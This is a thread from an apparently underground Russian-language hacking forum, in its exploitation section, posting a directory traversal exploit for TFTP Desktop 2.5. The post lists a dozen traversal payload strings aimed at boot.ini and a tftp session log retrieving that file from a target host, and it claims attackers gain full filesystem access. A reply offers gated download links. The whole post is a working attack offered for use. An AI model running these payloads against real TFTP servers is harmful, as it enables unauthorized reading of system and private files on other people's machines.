1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

TFTP Desktop 2.5 Directory Traversal Vulnera

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем M4n1x, 1 май 2015.

  1. TopicStarter Overlay
    M4n1x

    M4n1x

    Регистрация:
    6 фев 2015
    Сообщения:
    5
    Симпатии:
    2
    How the vulnerability can be reproduced
    Attack strings below:
    [*] Testing Path: .../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
    [*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
    Confirmation log:
    root@olovely:/# tftp
    tftp> connect
    (to) 192.168.1.53
    tftp> ascii
    tftp> get
    (files) .../.../.../.../.../.../boot.ini
    Received 211 bytes in 0.0 seconds
    tftp> quit
    What impact the vulnerability has on the vulnerable system
    * High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
     
    • Like Like x 1
    Метки:
  2. zakkk

    zakkk

    Регистрация:
    15 май 2013
    Сообщения:
    226
    Симпатии:
    88
    Please login or register to view links



    Download:
    Please login or register to view links
     

Поделиться этой страницей

Загрузка...